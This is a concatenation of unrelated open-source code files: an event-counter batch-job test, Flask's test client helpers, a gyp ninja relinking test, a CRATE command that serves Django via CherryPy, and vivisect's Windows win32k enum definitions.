self.assertEqual(StartExplorationRealtimeModel.get(
'1:%s' % self.EXP_ID).count, 1)
# The batch job has not run yet, so no entity for self.EXP_ID will
# have been created in the batch model yet.
with self.assertRaises(base_models.BaseModel.EntityNotFoundError):
stats_models.ExplorationAnnotationsModel.get(self.EXP_ID)
# Launch the batch computation.
StartExplorationEventCounter.start_computation()
# Data in realtime layer 0 is still there.
self.assertEqual(StartExplorationRealtimeModel.get(
'0:%s' % self.EXP_ID).count, 1)
# Data in realtime layer 1 has been deleted.
self.assertIsNone(StartExplorationRealtimeModel.get(
'1:%s' % self.EXP_ID, strict=False))
self.assertEqual(self.count_jobs_in_taskqueue(), 1)
self.process_and_flush_pending_tasks()
self.assertEqual(
stats_models.ExplorationAnnotationsModel.get(
self.EXP_ID).num_starts, 1)
# The overall count is still 1.
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 1)
# Data in realtime layer 0 has been deleted.
self.assertIsNone(StartExplorationRealtimeModel.get(
'0:%s' % self.EXP_ID, strict=False))
# Data in realtime layer 1 has been deleted.
self.assertIsNone(StartExplorationRealtimeModel.get(
'1:%s' % self.EXP_ID, strict=False))
def test_events_coming_in_while_batch_job_is_running(self):
with self.swap(
jobs_registry, 'ALL_CONTINUOUS_COMPUTATION_MANAGERS',
self.ALL_CONTINUOUS_COMPUTATION_MANAGERS_FOR_TESTS):
# Currently no events have been recorded.
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 0)
# Enqueue the batch computation. (It is running on 0 events.)
StartExplorationEventCounter._kickoff_batch_job()
# Record an event while this job is in the queue. Simulate
# this by directly calling on_incoming_event(), because using
# StartExplorationEventHandler.record() would just put the event
# in the task queue, which we don't want to flush yet.
event_services.StartExplorationEventHandler._handle_event(
self.EXP_ID, 1, feconf.DEFAULT_INIT_STATE_NAME, 'session_id', {},
feconf.PLAY_TYPE_NORMAL)
StartExplorationEventCounter.on_incoming_event(
event_services.StartExplorationEventHandler.EVENT_TYPE,
self.EXP_ID, 1, feconf.DEFAULT_INIT_STATE_NAME, 'session_id', {},
feconf.PLAY_TYPE_NORMAL)
# The overall count is now 1.
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 1)
# Finish the job.
self.process_and_flush_pending_tasks()
# When the batch job completes, the overall count is still 1.
self.assertEqual(
StartExplorationEventCounter.get_count(self.EXP_ID), 1)
# The batch job result should still be 0, since the event arrived
# after the batch job started.
with self.assertRaises(base_models.BaseModel.EntityNotFoundError):
stats_models.ExplorationAnnotationsModel.get(self.EXP_ID)
# TODO(sll): When we have some concrete ContinuousComputations running in
# production, add an integration test to ensure that the registration of event
# handlers in the main codebase is happening correctly.
|
pambot/SMSBeds
|
refs/heads/master
|
lib/flask/testing.py
|
783
|
# -*- coding: utf-8 -*-
"""
flask.testing
~~~~~~~~~~~~~
Implements test support helpers. This module is lazily imported
and usually not used in production environments.
:copyright: (c) 2011 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
from contextlib import contextmanager
from werkzeug.test import Client, EnvironBuilder
from flask import _request_ctx_stack
try:
from werkzeug.urls import url_parse
except ImportError:
from urlparse import urlsplit as url_parse
def make_test_environ_builder(app, path='/', base_url=None, *args, **kwargs):
"""Creates a new test builder with some application defaults thrown in."""
http_host = app.config.get('SERVER_NAME')
app_root = app.config.get('APPLICATION_ROOT')
if base_url is None:
url = url_parse(path)
base_url = 'http://%s/' % (url.netloc or http_host or 'localhost')
if app_root:
base_url += app_root.lstrip('/')
if url.netloc:
path = url.path
return EnvironBuilder(path, base_url, *args, **kwargs)
class FlaskClient(Client):
"""Works like a regular Werkzeug test client but has some knowledge about
how Flask works to defer the cleanup of the request context stack to the
end of a with body when used in a with statement. For general information
about how to use this class refer to :class:`werkzeug.test.Client`.
Basic usage is outlined in the :ref:`testing` chapter.
"""
preserve_context = False
@contextmanager
def session_transaction(self, *args, **kwargs):
"""When used in combination with a with statement this opens a
session transaction. This can be used to modify the session that
the test client uses. Once the with block is left the session is
stored back.
with client.session_transaction() as session:
session['value'] = 42
Internally this is implemented by going through a temporary test
request context and since session handling could depend on
request variables this function accepts the same arguments as
:meth:`~flask.Flask.test_request_context` which are directly
passed through.
"""
if self.cookie_jar is None:
raise RuntimeError('Session transactions only make sense '
'with cookies enabled.')
app = self.application
environ_overrides = kwargs.setdefault('environ_overrides', {})
self.cookie_jar.inject_wsgi(environ_overrides)
outer_reqctx = _request_ctx_stack.top
with app.test_request_context(*args, **kwargs) as c:
sess = app.open_session(c.request)
if sess is None:
raise RuntimeError('Session backend did not open a session. '
'Check the configuration')
# Since we have to open a new request context for the session
# handling we want to make sure that we hide out own context
# from the caller. By pushing the original request context
# (or None) on top of this and popping it we get exactly that
# behavior. It's important to not use the push and pop
# methods of the actual request context object since that would
# mean that cleanup handlers are called
_request_ctx_stack.push(outer_reqctx)
try:
yield sess
finally:
_request_ctx_stack.pop()
resp = app.response_class()
if not app.session_interface.is_null_session(sess):
app.save_session(sess, resp)
headers = resp.get_wsgi_headers(c.request.environ)
self.cookie_jar.extract_wsgi(c.request.environ, headers)
def open(self, *args, **kwargs):
kwargs.setdefault('environ_overrides', {}) \
['flask._preserve_context'] = self.preserve_context
as_tuple = kwargs.pop('as_tuple', False)
buffered = kwargs.pop('buffered', False)
follow_redirects = kwargs.pop('follow_redirects', False)
builder = make_test_environ_builder(self.application, *args, **kwargs)
return Client.open(self, builder,
as_tuple=as_tuple,
buffered=buffered,
follow_redirects=follow_redirects)
def __enter__(self):
if self.preserve_context:
raise RuntimeError('Cannot nest client invocations')
self.preserve_context = True
return self
def __exit__(self, exc_type, exc_value, tb):
self.preserve_context = False
# on exit we want to clean up earlier. Normally the request context
# stays preserved until the next request in the same thread comes
# in. See RequestGlobals.push() for the general behavior.
top = _request_ctx_stack.top
if top is not None and top.preserved:
top.pop()
|
matthaywardwebdesign/rethinkdb
|
refs/heads/next
|
external/v8_3.30.33.16/build/gyp/test/ninja/solibs_avoid_relinking/gyptest-solibs-avoid-relinking.py
|
216
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verify that relinking a solib doesn't relink a dependent executable if the
solib's public API hasn't changed.
"""
import os
import sys
import TestCommon
import TestGyp
# NOTE(fischman): This test will not work with other generators because the
# API-hash-based-mtime-preservation optimization is only implemented in
# ninja.py. It could be extended to the make.py generator as well pretty
# easily, probably.
# (also, it tests ninja-specific out paths, which would have to be generalized
# if this was extended to other generators).
test = TestGyp.TestGyp(formats=['ninja'])
test.run_gyp('solibs_avoid_relinking.gyp')
# Build the executable, grab its timestamp, touch the solib's source, rebuild
# executable, ensure timestamp hasn't changed.
test.build('solibs_avoid_relinking.gyp', 'b')
test.built_file_must_exist('b' + TestCommon.exe_suffix)
pre_stat = os.stat(test.built_file_path('b' + TestCommon.exe_suffix))
os.utime(os.path.join(test.workdir, 'solib.cc'),
(pre_stat.st_atime, pre_stat.st_mtime + 100))
test.sleep()
test.build('solibs_avoid_relinking.gyp', 'b')
post_stat = os.stat(test.built_file_path('b' + TestCommon.exe_suffix))
if pre_stat.st_mtime != post_stat.st_mtime:
test.fail_test()
else:
test.pass_test()
|
RudolfCardinal/crate
|
refs/heads/master
|
crate_anon/crateweb/core/management/commands/runcpserver.py
|
1
|
#!/usr/bin/env python
"""
crate_anon/crateweb/core/management/commands/runcpserver.py
===============================================================================
Copyright (C) 2015-2021 Rudolf Cardinal (rudolf@pobox.com).
This file is part of CRATE.
CRATE is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
CRATE is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with CRATE. If not, see <http://www.gnu.org/licenses/>.
===============================================================================
**Django management command framework for CherryPy.**
- Based on https://lincolnloop.com/blog/2008/mar/25/serving-django-cherrypy/
- Idea and code snippets borrowed from
http://www.xhtml.net/scripts/Django-CherryPy-server-DjangoCerise
- Adapted to run as a management command.
- Some bugs fixed by RNC.
- Then rewritten by RNC.
- Then modified to serve CRATE, with static files, etc.
- Then daemonizing code removed: https://code.djangoproject.com/ticket/4996
TEST COMMAND:
.. code-block:: bash
./manage.py runcpserver --port 8080 --ssl_certificate /etc/ssl/certs/ssl-cert-snakeoil.pem --ssl_private_key /etc/ssl/private/ssl-cert-snakeoil.key
""" # noqa
from argparse import ArgumentParser, Namespace
import logging
from typing import Any
# import errno
# import os
# import signal
# import time
# try:
# import grp
# import pwd
# unix = True
# except ImportError:
# grp = None
# pwd = None
# unix = False
import cherrypy
from django.conf import settings
from django.core.management.base import BaseCommand
from django.utils import translation
from crate_anon.crateweb.config.wsgi import application as wsgi_application
# COULD ALSO USE:
# from django.core.handlers.wsgi import WSGIHandler
# wsgi_application = WSGIHandler()
log = logging.getLogger(__name__)
CRATE_STATIC_URL_PATH = settings.STATIC_URL.rstrip('/')
NEED_UNIX = "Need UNIX for group/user operations"
DEFAULT_ROOT = settings.FORCE_SCRIPT_NAME
class Command(BaseCommand):
"""
Django management command to run this project in a CherryPy web server.
"""
help = ("Run this project in a CherryPy webserver. To do this, "
"CherryPy is required (pip install cherrypy).")
def add_arguments(self, parser: ArgumentParser) -> None:
# docstring in superclass
parser.add_argument(
'--host', type=str, default="127.0.0.1",
help="hostname to listen on (default: 127.0.0.1)")
parser.add_argument(
'--port', type=int, default=8088,
help="port to listen on (default: 8088)")
parser.add_argument(
"--server_name", type=str, default="localhost",
help="CherryPy's SERVER_NAME environ entry (default: localhost)")
# parser.add_argument(
# "--daemonize", action="store_true",
# help="whether to detach from terminal (default: False)")
# parser.add_argument(
# "--pidfile", type=str,
# help="write the spawned process ID to this file")
# parser.add_argument(
# "--workdir", type=str,
# help="change to this directory when daemonizing")
parser.add_argument(
"--threads", type=int, default=10,
help="Number of threads for server to use (default: 10)")
parser.add_argument(
"--ssl_certificate", type=str,
help="SSL certificate file "
"(e.g. /etc/ssl/certs/ssl-cert-snakeoil.pem)")
parser.add_argument(
"--ssl_private_key", type=str,
help="SSL private key file "
"(e.g. /etc/ssl/private/ssl-cert-snakeoil.key)")
# parser.add_argument(
# "--server_user", type=str, default="www-data",
# help="user to run daemonized process (default: www-data)")
# parser.add_argument(
# "--server_group", type=str, default="www-data",
# help="group to run daemonized process (default: www-data)")
parser.add_argument(
"--log_screen", dest="log_screen", action="store_true",
help="log access requests etc. to terminal (default)")
parser.add_argument(
"--no_log_screen", dest="log_screen", action="store_false",
help="don't log access requests etc. to terminal")
parser.add_argument(
"--debug_static", action="store_true",
help="show debug info for static file requests")
parser.add_argument(
"--root_path", type=str, default=DEFAULT_ROOT,
help=f"Root path to serve CRATE at. Default: {DEFAULT_ROOT}")
parser.set_defaults(log_screen=True)
# parser.add_argument(
# "--stop", action="store_true",
# help="stop server")
def handle(self, *args: str, **options: Any) -> None:
# docstring in superclass
opts = Namespace(**options)
# Activate the current language, because it won't get activated later.
try:
translation.activate(settings.LANGUAGE_CODE)
except AttributeError:
pass
# noinspection PyTypeChecker
runcpserver(opts)
# def change_uid_gid(uid, gid=None):
# """Try to change UID and GID to the provided values.
# UID and GID are given as names like 'nobody' not integer.
#
# Src: http://mail.mems-exchange.org/durusmail/quixote-users/4940/1/
# """
# if not unix:
# raise OSError(NEED_UNIX)
# if not os.geteuid() == 0:
# # Do not try to change the gid/uid if not root.
# return
# (uid, gid) = get_uid_gid(uid, gid)
# os.setgid(gid)
# os.setuid(uid)
# def get_uid_gid(uid, gid=None):
# """Try to change UID and GID to the provided values.
# UID and GID are given as names like 'nobody' not integer.
#
# Src: http://mail.mems-exchange.org/durusmail/quixote-users/4940/1/
# """
# if not unix:
# raise OSError(NEED_UNIX)
# uid, default_grp = pwd.getpwnam(uid)[2:4]
# if gid is None:
# gid = default_grp
# else:
# try:
# gid = grp.getgrnam(gid)[2]
# except KeyError:
# gid = default_grp
# return uid, gid
# def still_alive(pid):
# """
# Poll for process with given pid up to 10 times waiting .25 seconds in
# between each poll.
# Returns False if the process no longer exists otherwise, True.
# """
# for n in range(10):
# time.sleep(0.25)
# try:
# # poll the process state
# os.kill(pid, 0)
# except OSError as e:
# if e[0] == errno.ESRCH:
# # process has died
# return False
# else:
# raise # TODO
# return True
# def stop_server(pidfile):
# """
# Stop process whose pid was written to supplied pidfile.
# First try SIGTERM and if it fails, SIGKILL.
# If process is still running, an exception is raised.
# """
# if os.path.exists(pidfile):
# pid = int(open(pidfile).read())
# try:
# os.kill(pid, signal.SIGTERM)
# except OSError: # process does not exist
# os.remove(pidfile)
# return
# if still_alive(pid):
# # process didn't exit cleanly, make one last effort to kill it
# os.kill(pid, signal.SIGKILL)
# if still_alive(pid):
# raise OSError(f"Process {pid} did not stop.")
# os.remove(pidfile)
class Missing(object):
"""
CherryPy "application" that is a basic web interface to say "not here".
"""
config = {
'/': {
# Anything so as to prevent complaints about an empty config.
'tools.sessions.on': False,
}
}
@cherrypy.expose
def index(self) -> str:
return (
"[CRATE CherryPy server says:] "
"Nothing to see here. Wrong URL path. "
"(If you are sure it's right, has the server administrator "
"set the 'root_path' option correctly?)"
)
# noinspection PyUnresolvedReferences
def start_server(host: str,
port: int,
threads: int,
server_name: str,
root_path: str,
log_screen: bool,
ssl_certificate: str,
ssl_private_key: str,
debug_static: bool) -> None:
"""
Start CherryPy server.
Args:
host: hostname to listen on (e.g. ``127.0.0.1``)
port: port number to listen on
threads: number of threads to use in the thread pool
server_name: CherryPy SERVER_NAME environment variable (e.g.
``localhost``)
root_path: root path to mount server at
log_screen: show log to console?
ssl_certificate: optional filename of an SSL certificate
ssl_private_key: optional filename of an SSL private key
debug_static: show debug info for static requests?
"""
# if daemonize and server_user and server_group:
# # ensure the that the daemon runs as specified user
# change_uid_gid(server_user, server_group)
cherrypy.config.update({
'server.socket_host': host,
'server.socket_port': port,
'server.thread_pool': threads,
'server.server_name': server_name,
'server.log_screen': log_screen,
})
if ssl_certificate and ssl_private_key:
cherrypy.config.update({
'server.ssl_module': 'builtin',
'server.ssl_certificate': ssl_certificate,
'server.ssl_private_key': ssl_private_key,
})
log.info(f"Starting on host: {host}")
log.info(f"Starting on port: {port}")
log.info(f"Static files will be served from filesystem path: "
f"{settings.STATIC_ROOT}")
log.info(f"Static files will be served at URL path: "
f"{CRATE_STATIC_URL_PATH}")
log.info(f"CRATE will be at: {root_path}")
log.info(f"Thread pool size: {threads}")
static_config = {
'/': {
'tools.staticdir.root': settings.STATIC_ROOT,
'tools.staticdir.debug': debug_static,
},
CRATE_STATIC_URL_PATH: {
'tools.staticdir.on': True,
'tools.staticdir.dir': '',
},
}
cherrypy.tree.mount(Missing(), '', config=static_config)
cherrypy.tree.graft(wsgi_application, root_path)
# noinspection PyBroadException,PyPep8
try:
cherrypy.engine.start()
cherrypy.engine.block()
except Exception:
# 2017-03-13: shouldn't restrict to KeyboardInterrupt!
cherrypy.engine.stop()
def runcpserver(opts: Namespace) -> None:
"""
Launch the CherryPy server using arguments from an
:class:`argparse.Namespace`.
Args:
opts: the command-line :class:`argparse.Namespace`
"""
# if opts.stop:
# if not opts.pidfile:
# raise ValueError("Must specify --pidfile to use --stop")
# print('stopping server')
# stop_server(opts.pidfile)
# return True
# if opts.daemonize:
# if not opts.pidfile:
# opts.pidfile = f'/var/run/cpserver_{opts.port}.pid'
# stop_server(opts.pidfile)
#
# if opts.workdir:
# become_daemon(our_home_dir=opts.workdir)
# else:
# become_daemon()
#
# fp = open(opts.pidfile, 'w')
# fp.write(f"{os.getpid()}\n")
# fp.close()
# Start the webserver
log.info(f'starting server with options {opts}')
start_server(
host=opts.host,
port=opts.port,
threads=opts.threads,
server_name=opts.server_name,
root_path=opts.root_path,
log_screen=opts.log_screen,
ssl_certificate=opts.ssl_certificate,
ssl_private_key=opts.ssl_private_key,
debug_static=opts.debug_static,
)
def main() -> None:
"""
Command-line entry point (not typically used directly).
"""
command = Command()
parser = ArgumentParser()
command.add_arguments(parser)
cmdargs = parser.parse_args()
runcpserver(cmdargs)
if __name__ == '__main__':
main()
|
vvv1559/intellij-community
|
refs/heads/master
|
python/testData/refactoring/unwrap/whileUnwrap_after.py
|
273
|
x = 1
|
joshuahoman/vivisect
|
refs/heads/master
|
vstruct/defs/windows/win_6_1_i386/win32k.py
|
7
|
# Version: 6.1
# Architecture: i386
import vstruct
from vstruct.primitives import *
ETW_THREAD_FLAG = v_enum()
ETW_THREAD_FLAG.ETW_THREAD_FLAG_HAD_INPUT = 0
ETW_THREAD_FLAG.ETW_THREAD_FLAG_HAD_VISIBLE_WINDOWS = 1
ETW_THREAD_FLAG.ETW_THREAD_FLAG_HAS_NEW_INPUT = 2
ETW_THREAD_FLAG.ETW_THREAD_FLAG_MAX = 3
TOUCHSTATE = v_enum()
TOUCHSTATE.TOUCHSTATE_INVALID = -1
TOUCHSTATE.TOUCHSTATE_NONE = 0
TOUCHSTATE.TOUCHSTATE_DOWN = 1
TOUCHSTATE.TOUCHSTATE_MOVE = 2
TOUCHSTATE.TOUCHSTATE_UPOUTOFRANGE = 3
TOUCHSTATE.TOUCHSTATE_INAIR = 4
TOUCHSTATE.TOUCHSTATE_INAIRMOVE = 5
TOUCHSTATE.TOUCHSTATE_INAIROUTOFRANGE = 6
TOUCHSTATE.TOUCHSTATE_COUNT = 7
WHEA_ERROR_SEVERITY = v_enum()
WHEA_ERROR_SEVERITY.WheaErrSevRecoverable = 0
WHEA_ERROR_SEVERITY.WheaErrSevFatal = 1
WHEA_ERROR_SEVERITY.WheaErrSevCorrected = 2
WHEA_ERROR_SEVERITY.WheaErrSevInformational = 3
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED = v_enum()
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_UNINITIALIZED = 0
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_HD15 = 1
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_DVI = 2
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_HDMI = 3
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_HDMI2 = 4
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_SVIDEO_4PIN = 5
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_SVIDEO_7PIN = 6
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_RCA_COMPOSITE = 7
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_RCA_3COMPONENT = 8
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_BNC = 9
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_RF = 10
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_SDTVDONGLE = 11
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_INTERNAL = 12
D3DKMDT_VIDEO_OUTPUT_TECHNOLOGY_DEPRECATED.D3DKMDT_VOT_DEPRECATED_OTHER = 255
SM_STORAGE_MODIFIER = v_enum()
SM_STORAGE_MODIFIER.SmStorageActual = 0
SM_STORAGE_MODIFIER.SmStorageNonActual = 1
DMM_MONITOR_PRESENCE_EVENT_TYPE = v_enum()
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_UNINITIALIZED = 0
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_ADDMONITOR = 1
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_REMOVEMONITOR = 2
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_DRIVERARRIVAL = 3
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_DRIVERQUERYREMOVE = 4
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_DRIVERREMOVECANCELLED = 5
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_DRIVERREMOVECOMPLETE = 6
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_DEVICENODEREADY = 7
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_EDIDCHANGE = 8
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_MONITORDISABLE = 9
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_MONITORENABLE = 10
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_ADAPTERADD = 11
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_ADAPTERREMOVAL = 12
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_INVALIDATION = 13
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_ADDSIMULATEDMONITOR = 1073741825
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_REMOVESIMULATEDMONITOR = 1073741826
DMM_MONITOR_PRESENCE_EVENT_TYPE.DMM_MPET_MAXVALID = 1073741826
REG_NOTIFY_CLASS = v_enum()
REG_NOTIFY_CLASS.RegNtDeleteKey = 0
REG_NOTIFY_CLASS.RegNtPreDeleteKey = 0
REG_NOTIFY_CLASS.RegNtSetValueKey = 1
REG_NOTIFY_CLASS.RegNtPreSetValueKey = 1
REG_NOTIFY_CLASS.RegNtDeleteValueKey = 2
REG_NOTIFY_CLASS.RegNtPreDeleteValueKey = 2
REG_NOTIFY_CLASS.RegNtSetInformationKey = 3
REG_NOTIFY_CLASS.RegNtPreSetInformationKey = 3
REG_NOTIFY_CLASS.RegNtRenameKey = 4
REG_NOTIFY_CLASS.RegNtPreRenameKey = 4
REG_NOTIFY_CLASS.RegNtEnumerateKey = 5
REG_NOTIFY_CLASS.RegNtPreEnumerateKey = 5
REG_NOTIFY_CLASS.RegNtEnumerateValueKey = 6
REG_NOTIFY_CLASS.RegNtPreEnumerateValueKey = 6
REG_NOTIFY_CLASS.RegNtQueryKey = 7
REG_NOTIFY_CLASS.RegNtPreQueryKey = 7
REG_NOTIFY_CLASS.RegNtQueryValueKey = 8
REG_NOTIFY_CLASS.RegNtPreQueryValueKey = 8
REG_NOTIFY_CLASS.RegNtQueryMultipleValueKey = 9
REG_NOTIFY_CLASS.RegNtPreQueryMultipleValueKey = 9
REG_NOTIFY_CLASS.RegNtPreCreateKey = 10
REG_NOTIFY_CLASS.RegNtPostCreateKey = 11
REG_NOTIFY_CLASS.RegNtPreOpenKey = 12
REG_NOTIFY_CLASS.RegNtPostOpenKey = 13
REG_NOTIFY_CLASS.RegNtKeyHandleClose = 14
REG_NOTIFY_CLASS.RegNtPreKeyHandleClose = 14
REG_NOTIFY_CLASS.RegNtPostDeleteKey = 15
REG_NOTIFY_CLASS.RegNtPostSetValueKey = 16
REG_NOTIFY_CLASS.RegNtPostDeleteValueKey = 17
REG_NOTIFY_CLASS.RegNtPostSetInformationKey = 18
REG_NOTIFY_CLASS.RegNtPostRenameKey = 19
REG_NOTIFY_CLASS.RegNtPostEnumerateKey = 20
REG_NOTIFY_CLASS.RegNtPostEnumerateValueKey = 21
REG_NOTIFY_CLASS.RegNtPostQueryKey = 22
REG_NOTIFY_CLASS.RegNtPostQueryValueKey = 23
REG_NOTIFY_CLASS.RegNtPostQueryMultipleValueKey = 24
REG_NOTIFY_CLASS.RegNtPostKeyHandleClose = 25
REG_NOTIFY_CLASS.RegNtPreCreateKeyEx = 26
REG_NOTIFY_CLASS.RegNtPostCreateKeyEx = 27
REG_NOTIFY_CLASS.RegNtPreOpenKeyEx = 28
REG_NOTIFY_CLASS.RegNtPostOpenKeyEx = 29
REG_NOTIFY_CLASS.RegNtPreFlushKey = 30
REG_NOTIFY_CLASS.RegNtPostFlushKey = 31
REG_NOTIFY_CLASS.RegNtPreLoadKey = 32
REG_NOTIFY_CLASS.RegNtPostLoadKey = 33
REG_NOTIFY_CLASS.RegNtPreUnLoadKey = 34
REG_NOTIFY_CLASS.RegNtPostUnLoadKey = 35
REG_NOTIFY_CLASS.RegNtPreQueryKeySecurity = 36
REG_NOTIFY_CLASS.RegNtPostQueryKeySecurity = 37
REG_NOTIFY_CLASS.RegNtPreSetKeySecurity = 38
REG_NOTIFY_CLASS.RegNtPostSetKeySecurity = 39
REG_NOTIFY_CLASS.RegNtCallbackObjectContextCleanup = 40
REG_NOTIFY_CLASS.RegNtPreRestoreKey = 41
REG_NOTIFY_CLASS.RegNtPostRestoreKey = 42
REG_NOTIFY_CLASS.RegNtPreSaveKey = 43
REG_NOTIFY_CLASS.RegNtPostSaveKey = 44
REG_NOTIFY_CLASS.RegNtPreReplaceKey = 45
REG_NOTIFY_CLASS.RegNtPostReplaceKey = 46
REG_NOTIFY_CLASS.MaxRegNtNotifyClass = 47
DEVICE_RELATION_TYPE = v_enum()
DEVICE_RELATION_TYPE.BusRelations = 0
DEVICE_RELATION_TYPE.EjectionRelations = 1
DEVICE_RELATION_TYPE.PowerRelations = 2
DEVICE_RELATION_TYPE.RemovalRelations = 3
DEVICE_RELATION_TYPE.TargetDeviceRelation = 4
DEVICE_RELATION_TYPE.SingleBusRelations = 5
DEVICE_RELATION_TYPE.TransportRelations = 6
D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_TYPE = v_enum()
D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_TYPE.D3DKMDT_VPPMT_UNINITIALIZED = 0
D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_TYPE.D3DKMDT_VPPMT_NOPROTECTION = 1
D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_TYPE.D3DKMDT_VPPMT_MACROVISION_APSTRIGGER = 2
D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_TYPE.D3DKMDT_VPPMT_MACROVISION_FULLSUPPORT = 3
D3DKMDT_VIDPN_PRESENT_PATH_COPYPROTECTION_TYPE.D3DKMDT_VPPMT_NOTSPECIFIED = 255
FILE_INFORMATION_CLASS = v_enum()
FILE_INFORMATION_CLASS.FileDirectoryInformation = 1
FILE_INFORMATION_CLASS.FileFullDirectoryInformation = 2
FILE_INFORMATION_CLASS.FileBothDirectoryInformation = 3
FILE_INFORMATION_CLASS.FileBasicInformation = 4
FILE_INFORMATION_CLASS.FileStandardInformation = 5
FILE_INFORMATION_CLASS.FileInternalInformation = 6
FILE_INFORMATION_CLASS.FileEaInformation = 7
FILE_INFORMATION_CLASS.FileAccessInformation = 8
FILE_INFORMATION_CLASS.FileNameInformation = 9
FILE_INFORMATION_CLASS.FileRenameInformation = 10
FILE_INFORMATION_CLASS.FileLinkInformation = 11
FILE_INFORMATION_CLASS.FileNamesInformation = 12
FILE_INFORMATION_CLASS.FileDispositionInformation = 13
FILE_INFORMATION_CLASS.FilePositionInformation = 14
FILE_INFORMATION_CLASS.FileFullEaInformation = 15
FILE_INFORMATION_CLASS.FileModeInformation = 16
FILE_INFORMATION_CLASS.FileAlignmentInformation = 17
FILE_INFORMATION_CLASS.FileAllInformation = 18
FILE_INFORMATION_CLASS.FileAllocationInformation = 19
FILE_INFORMATION_CLASS.FileEndOfFileInformation = 20
FILE_INFORMATION_CLASS.FileAlternateNameInformation = 21
FILE_INFORMATION_CLASS.FileStreamInformation = 22
FILE_INFORMATION_CLASS.FilePipeInformation = 23
FILE_INFORMATION_CLASS.FilePipeLocalInformation = 24
FILE_INFORMATION_CLASS.FilePipeRemoteInformation = 25
FILE_INFORMATION_CLASS.FileMailslotQueryInformation = 26
FILE_INFORMATION_CLASS.FileMailslotSetInformation = 27
FILE_INFORMATION_CLASS.FileCompressionInformation = 28
FILE_INFORMATION_CLASS.FileObjectIdInformation = 29
FILE_INFORMATION_CLASS.FileCompletionInformation = 30
FILE_INFORMATION_CLASS.FileMoveClusterInformation = 31
FILE_INFORMATION_CLASS.FileQuotaInformation = 32
FILE_INFORMATION_CLASS.FileReparsePointInformation = 33
FILE_INFORMATION_CLASS.FileNetworkOpenInformation = 34
FILE_INFORMATION_CLASS.FileAttributeTagInformation = 35
FILE_INFORMATION_CLASS.FileTrackingInformation = 36
FILE_INFORMATION_CLASS.FileIdBothDirectoryInformation = 37
FILE_INFORMATION_CLASS.FileIdFullDirectoryInformation = 38
FILE_INFORMATION_CLASS.FileValidDataLengthInformation = 39
FILE_INFORMATION_CLASS.FileShortNameInformation = 40
FILE_INFORMATION_CLASS.FileIoCompletionNotificationInformation = 41
FILE_INFORMATION_CLASS.FileIoStatusBlockRangeInformation = 42
FILE_INFORMATION_CLASS.FileIoPriorityHintInformation = 43
FILE_INFORMATION_CLASS.FileSfioReserveInformation = 44
FILE_INFORMATION_CLASS.FileSfioVolumeInformation = 45
FILE_INFORMATION_CLASS.FileHardLinkInformation = 46
FILE_INFORMATION_CLASS.FileProcessIdsUsingFileInformation = 47
FILE_INFORMATION_CLASS.FileNormalizedNameInformation = 48
FILE_INFORMATION_CLASS.FileNetworkPhysicalNameInformation = 49
FILE_INFORMATION_CLASS.FileIdGlobalTxDirectoryInformation = 50
